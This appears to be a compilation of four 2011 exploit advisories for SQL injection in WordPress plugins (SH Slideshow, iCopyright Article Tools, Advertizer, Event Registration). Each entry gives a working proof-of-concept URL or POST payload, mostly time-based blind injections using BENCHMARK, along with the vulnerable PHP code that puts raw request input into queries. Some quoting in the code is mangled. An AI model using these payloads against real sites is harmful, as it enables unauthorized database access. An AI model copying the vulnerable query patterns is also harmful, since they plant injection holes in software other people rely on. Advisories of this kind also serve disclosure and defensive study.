1.WordPress SH Slideshow plugin <= 3.1.4 SQL Injection Vulnerability
# Exploit Title: WordPress SH Slideshow plugin <= 3.1.4 SQL Injection Vulnerability # Date: 2011-08-29 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/sh-slideshow.3.1.4.zip # Version: 3.1.4 (tested) ————— PoC (POST data) ————— http://www.sh3llc0de.com/wp-content/plugins/sh-slideshow/ajax.php id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20 ————— Vulnerable code ————— $result = $wpdb->query(‘’delete from sh_slides where id = ‘’.$_POST[‘’id’’]); 2.WordPress iCopyright(R) Article Tools plugin <= 1.1.4 SQL Injection # Exploit Title: WordPress iCopyright(R) Article Tools plugin <= 1.1.4 SQL Injection Vulnerability # Date: 2011-08-29 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/copyright-licensing-tools.zip # Version: 1.1.4 (tested) # Note: magic_quotes has to be turned off — PoC — http://www.sh3llc0de.com/wp-content/plugins/copyright-licensing-tools/icopyright_xml.php?id=1’’ AND 1=1–%20 ————— Vulnerable code ————— $icopyright_post_id = $_GET[‘’id’’]; //requested post id … $response = $wpdb->get_results(“SELECT FROM $posttable JOIN $usertable on $posttable.post_author=$usertable.ID WHERE $posttable.ID = ‘’$icopyright_post_id’’”); 3.WordPress Advertizer plugin <= 1.0 SQL Injection Vulnerability # Exploit Title: WordPress Advertizer plugin <= 1.0 SQL Injection Vulnerability # Date: 2011-08-29 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/advertizer.1.0.zip # Version: 1.0 (tested) # Note: magic_quotes has to be turned off ————— PoC (POST data) ————— http://www.sh3llc0de.com/wp-content/plugins/advertizer/click_ads.php id=-1’’ AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20 ————— Vulnerable code ————— $res = $wpdb->get_row(“SELECT limit_clicks , trace_clicks FROM ".$wpdb->prefix."adv_v_base WHERE id = ‘’”.$_POST[id].”‘’ limit 1;”);4.WordPress Event Registration plugin <= 5.4.3 SQL Injection # Exploit Title: WordPress Event Registration plugin <= 5.4.3 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/event-registration.5.43.zip # Version: 5.4.3 (tested) # Note: magic_quotes has to be turned off — PoC — http://www.sh3llc0de.com/wp-content/plugins/event-registration/event_registration_export.php?id=-1’’ AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20 ————— Vulnerable code ————— $id= $_REQUEST[‘’id’’]; … $sql = “SELECT FROM “ . $events_detail_tbl . “ WHERE id=’’$id’’”; $result = mysql_query($sql); |